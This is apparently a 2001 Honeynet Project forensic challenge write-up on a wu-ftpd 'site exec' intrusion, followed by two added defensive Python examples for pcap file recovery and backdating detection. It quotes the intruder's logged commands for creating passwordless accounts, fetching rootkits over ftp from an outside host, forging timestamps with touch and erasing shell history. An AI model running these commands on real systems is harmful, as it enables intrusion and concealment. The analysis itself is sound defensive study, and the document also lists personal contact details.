######################################################################
#
# Project Honeynet - Scan 19 - 2001.10
#
# Author: Jason Prost
#         jprost@telenisus.com
#
######################################################################

#====================================================================
# 1. Which vulnerability did the intruder exploit?
#====================================================================

Two Input Validation Problems in FTPD
http://www.cert.org/advisories/CA-2000-13.html

"The wu-ftpd "site exec" vulnerability is the result of missing
character-formatting argument in several function calls that
implement the "site exec" command functionality. Normally if "site
exec" is enabled, a user logged into an ftp server (including the
'ftp' or 'anonymous' user) may execute a restricted subset of quoted
commands on the server itself. However, if a malicious user can pass
character format strings consisting of carefully constructed
*printf() conversion characters (%f, %p, %n, etc) while executing a
"site exec" command, the ftp daemon may be tricked into executing
arbitrary code as root."

The vulnerability is seen during the first ftp session, starting at
frame 232, and clearly shown in frames 240 and 245. Finally, in frame
414 we can see the issuance of 0bin0sh, which effectively gave the
hacker root access through the ftp control session.

#====================================================================
# 2. What ways, and in what order, did the intruder use to connect
#    and run commands on the system?
#====================================================================

We start seeing suspicious activity well prior to the ftp attempts
that give the intruder access to the system. Although the access is
from two different addresses, it is later seen that both addresses
participate in the hacking activity.

1. telnet - 09/16-18:52:51.989869 217.156.93.166:61200 -> 192.168.1.102:23
   failed login attempts for nobody and uucp

2.
   tcp 24 - 09/16-18:54:02.316596 217.156.93.166:61202 -> 192.168.1.102:24
   backdoor check for non-standard SSH (port 24)

3. tcp 6666 - 09/16-18:54:14.859871 217.156.93.166:61203 -> 192.168.1.102:6666
   backdoor check for non-standard SSH (port 6666)

4. ftp - 09/16-18:55:45.198773 207.35.251.172:2243 -> 192.168.1.102:21
   hack system through ftp exploit
      id
      w
      dir
      [much meandering around /usr/local blahh blahh]
      passwd -d nobody
      mkdir /etc/X11/applnk/Internet/.etc
      mkdir /etc/X11/applnk/Internet/.etcpasswd
      addusr dns
      passwd dns -d
      touch -acmr /etc/X11/applnk/Internet/.etc /etc/passwd
      touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc
      [much checking with ls with various command line options]

5. telnet - 09/16-19:13:27.206847 217.156.93.166:61209 -> 192.168.1.102:23
   connect back in as nobody
      w
      su dns
      cd /tmp
      mc -s (not found)
      ftp teleport.go.ro
      cd /dev/rd
      mkdir /dev/sdc0
      ftp teleport.go.ro
      get rootkit Zer0.tar.gz
      get rootkit copy.tar.gz
      get rootkit ooty.tar.gz
      tar -xvf Zer0.tar.gz
      Go (execute the rootkit's setup script)

6. tcp 24 - 09/16-19:51:58.559708 217.156.93.166:61223 -> 192.168.1.102:24
   connects... does what... don't know

7. tcp 24 - 09/16-19:59:48.228693 217.156.93.166:61226 -> 192.168.1.102:24

8. telnet - 09/16-19:59:57.150510 217.156.93.166:61227 -> 192.168.1.102:23

9. tcp 24 - 09/16-20:07:17.066994 217.156.93.166:61230 -> 192.168.1.102:24

#====================================================================
# 3. How did the intruder try to hide his edits from the MAC times?
#====================================================================

(I'm assuming that by MAC times you mean the files' modification and
access timestamps... maybe I'm wrong...)

The intruder used the touch command to modify various files' access
and modification times. The 'a' and 'm' options change the access
time and the modification time of the file, respectively.
Option 'c' prevents files from being created unless they already
exist, and option 'r' uses the access and modification times from a
specified reference file.

example: touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd

What is interesting is that the second time the intruder uses this
command (touch -acmr /etc/X11/applnk/Internet/.etc /etc) it appears
that he/she modified the MAC times of /etc to those of the just
created .etc directory. hmmmm???

Additionally, the intruder had various scripts within the rootkits
that performed various log file cleanup and file time cleanup.

#====================================================================
# 4. The intruder downloaded rootkits, what were they called? Are
#    they new/custom rootkits?
#====================================================================

The intruder downloaded three files, although only one was
uncompressed and exploded. All appear to be modified/customized kits.

- Zer0.tar.gz
  - adore.h / adr.tgz / adr2.tgz - adore, a well known rootkit
  - Go - titled "t0rnkit" but with the addition of his/her own mod
    "Modificat de mine... Viruzzel" (Romanian for "Modified by me...
    Viruzzel"), indicating that he/she has modified the script
  - ssh.tgz - SSH 1.2.27 with some additions
  - tls.tgz - includes various elements already contained within Go,
    as well as login-.c (already compiled) and linsniffer.c (already
    compiled)

- copy.tar.gz - appears to be a custom assembled set of tools.
  - wu-scan by 03m0s1s / looks for the SITE EXEC vuln on other systems
  - smurf 5.0 (compiled)
  - ssh 1.2.26 (compiled)
  - 7350wu.c (zxploit) (compiled)
  - generate.c / genmass.c / process_list.c (all compiled)
  - slice2.c (mj2 & mj3) (compiled twice???)

- ooty.tar.gz - again another custom assembled set of tools.
  - bighole.c - modifies sush to the proper owner and mode
  - bindpar.x - a bind hunting tool
  - Cr0n - written by AKKE - runs /tmp/cron_echo every minute
    (Cr0n / crontab.c) (compiled)
  - kernel.c - (compiled) - a cursory check doesn't find any known
    source
  - motd - a wonderfully worded motd file!!!
  - suidperl (bighole.c / flare / perl.x / sush) written by Marchew
    Industries
  - prlnx.sh (doesn't have all the files necessary to function)

#====================================================================
# 5. Recover (tell how you did it too) the rootkits from the snort
#    binary capture
#====================================================================

I refer everyone to Christopher Lee's write-up of scan 18:
http://project.honeynet.org/scans/scan18/som/som13/

In it he answers the bonus question by detailing how to pull files
from Ethereal. This became an easier task than I performed prior
with Ethereal. Hadn't used the tool yet... although friends kept
suggesting it. It is an amazing tool!

I also recovered the transfers by extracting out the binary contents
of the transfer (the hex code), packing the code using Perl or some
other programming language, then gunzip and untar.

However, probably the easiest would be to simply pull it from the
same location the hacker did (if you have no scruples and want to
break various trespassing laws). By verifying the directory listing
you can be fairly sure that you are looking at the same package.

#====================================================================
# 6. What does the rootkit do to hide the presence of the attacker on
#    the system?
#====================================================================

*Specific filesystem mods:

   touch -acmr /etc/default /etc/pam.d
   touch -acmr /etc/default /etc/pam.d/*
   rm -f vrssnk
   rm -f /usr/info/.t0rn/shsml
   rm -rf Zer0
   cd /usr/X11R6/bin/.,/copy/adr/
   rm -rf *tgz
   rm -rf *.c *.h Makefile* cnfad CVS
   rm -rf /bin/.bash_history
   ln -s /dev/null /bin/.bash_history
   touch -acmr /tmp/.dir1 /bin
   touch -acmr /tmp/.dir2 /usr/X11R6/bin
   touch -acmr /tmp/.dir3 /etc/rc.d/rc3.d
   touch -acmr /root /etc
   rm -rf /tmp/.dir*

*Specific to the processes that run: it uses Adore's ava program to
hide them.

   Go(183): ./ava h /usr/X11R6/bin/.,
   Go(184): ./ava h /usr/info/.t0rn
   Go(185): ./ava h /dev/rd/sdc0
   Go(186): ./ava h /dev/rd/nscd.init
   Go(187): ./ava h /etc/rc.d/rc3.d/S50inet
   Go(188): ./ava h /usr/X11R6/lib/X11/.~
   Go(199): ./ava h /usr/X11R6/bin/.,
   Go(200): ./ava h /usr/info/.t0rn
   Go(201): ./ava h /dev/rd/sdc0
   Go(202): ./ava h /dev/rd/nscd.init
   Go(203): ./ava h /etc/rc.d/rc3.d/S50inet
   Go(204): ./ava h /usr/X11R6/lib/X11/.~

#====================================================================
# 7. What did you learn from this exercise?
#====================================================================

Hmmmm... there are several things that proved to be valuable by going
through this exercise:

1. How important it is to maintain proper security rev levels of
   software. It is so easy to fall behind in version numbers and wind
   up being the target of an attack/hack.

2. How to use Ethereal
   http://www.ethereal.org

3. The necessity to keep an open mind when performing analysis of
   scans. Ensure that you check over your work again. Don't rush to
   conclusions when there is so much data!

#====================================================================
# 8. How long did this challenge take you?
#====================================================================

5 hours total (with write-up)

#====================================================================
# Based on this challenge, write an example letter of notification to
# the source owner that attacked the system. Include any evidence or
# logs that you feel important.
#====================================================================

Although an email and other action are appropriate toward the
attacker, I would send an email to admin@teleport.go.ro, whose server
is still open to the username and password that are now available in
your logs. There probably should be some legalese within the letter
to ensure that the administrators are aware that if they were
participants they are guilty through association.

I'm not sure that either the Canadian School Project or
ns.desteptarea.ro are anything more than hosts the hacker bounced
through. An email informing them of the inappropriate use of their
systems certainly is called for.

An email could be formally sent to hatcheryhatched@hotmail.com
(making the assumption that that is the hacker's email addy).

Certainly nothing that I would write would provide the proper legal
babbling that is necessary prior to taking whatever other actions are
necessary.

later...
jason...

---------------------------------------------------------------------
Jason Prost
Network Security Engineer
1.630.795.4248 phone
1.877.434.6146 cell
jprost@telenisus.com
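Added example for question 5 (recovering a transferred file from the capture). This is not the author's code or any Honeynet tool: it builds a small constructed libpcap file in memory, reassembles the TCP payload of an ftp data transfer by sequence number (tolerating out-of-order and retransmitted segments), then gunzips the result; the addresses, ports and file contents are all constructed.

```python
import gzip, struct

ORIGINAL = b"#!/bin/sh\n# constructed stand-in for a fetched setup script\n"
FILE_DATA = gzip.compress(ORIGINAL)   # what crosses the wire

def tcp_frame(sport, dport, seq, payload):
    """Minimal Ethernet/IPv4/TCP frame (constructed; checksums left zero)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes([10, 0, 0, 1]), bytes([192, 168, 1, 102]))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload

def pcap_bytes(frames):
    """Wrap frames in a little-endian libpcap file (link type 1 = Ethernet)."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)

def reassemble(pcap, dport):
    """TCP payload sent to dport, in sequence order; duplicates are merged."""
    segs, off = {}, 24
    while off + 16 <= len(pcap):
        incl = struct.unpack("<IIII", pcap[off:off + 16])[2]
        frame, off = pcap[off + 16:off + 16 + incl], off + 16 + incl
        if frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                              # not IPv4 carrying TCP
        ihl = (frame[14] & 0x0F) * 4
        total = struct.unpack("!H", frame[16:18])[0]
        tcp = frame[14 + ihl:14 + total]
        _, dp, seq = struct.unpack("!HHI", tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if dp == dport and payload:
            segs[seq] = payload
    base, data = min(segs, default=0), b""
    for seq in sorted(segs):
        start = seq - base
        if start > len(data):
            raise ValueError("capture is missing bytes at offset %d" % len(data))
        data += segs[seq][len(data) - start:]     # drop any overlapping prefix
    return data

def demo():
    """Constructed capture: segments arrive out of order, one is retransmitted."""
    chunks = [FILE_DATA[i:i + 7] for i in range(0, len(FILE_DATA), 7)]
    frames = [tcp_frame(20, 1027, 1000 + 7 * i, c) for i, c in enumerate(chunks)]
    frames[1], frames[2] = frames[2], frames[1]   # delivered out of order
    frames.append(frames[0])                      # retransmission of first segment
    return gzip.decompress(reassemble(pcap_bytes(frames), 1027))
```

On a real snort capture the same logic applies once you pick the data connection's destination port from the PORT command in the control session.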
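Added example for questions 3 and 6 (the touch -acmr timestamp copying). This is not the author's code or part of any rootkit: it mimics what touch -acmr does with os.utime and then shows the check a responder can still run, because utime sets atime and mtime but the kernel stamps ctime itself, so a backdated entry shows a ctime far newer than its mtime. The file names and contents are constructed in a temporary directory.

```python
import os, shutil, tempfile, time

def copy_times(reference: str, target: str) -> None:
    """Mimic `touch -acmr reference target`: copy atime and mtime from the
    reference onto target; like -c, a missing target is silently skipped."""
    if not os.path.lexists(target):
        return
    st = os.stat(reference)
    os.utime(target, ns=(st.st_atime_ns, st.st_mtime_ns))

def ctime_minus_mtime(path: str) -> float:
    """Seconds by which the inode change time is newer than the mtime.
    utime()/touch can forge atime and mtime, but the kernel sets ctime
    itself, so an "old" entry whose ctime is recent was re-stamped."""
    st = os.lstat(path)
    return st.st_ctime - st.st_mtime

def find_backdated(root: str, threshold: float = 3600.0) -> list:
    """Walk root and report entries whose ctime trails mtime by more than
    threshold seconds (a normal edit moves ctime and mtime together)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if ctime_minus_mtime(path) > threshold:
                hits.append(path)
    return sorted(hits)

def demo() -> dict:
    """Constructed scenario: a 90-day-old 'passwd' and a freshly created
    hidden '.etc' directory whose timestamps are copied from it."""
    tmp = tempfile.mkdtemp()
    ref = os.path.join(tmp, "passwd")
    with open(ref, "w") as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed content
    old = time.time() - 90 * 86400
    os.utime(ref, (old, old))          # make it look long untouched
    hidden = os.path.join(tmp, ".etc")
    os.mkdir(hidden)
    copy_times(ref, hidden)            # the intruder's touch -acmr
    result = {
        "hidden_mtime_matches": int(os.stat(hidden).st_mtime) == int(old),
        "flagged": find_backdated(tmp),
        "expected": sorted([hidden, ref]),
    }
    shutil.rmtree(tmp)
    return result
```

Note that the reference file is flagged too: backdating it with utime moved its ctime as well, which is exactly the trace the intruder could not remove with touch.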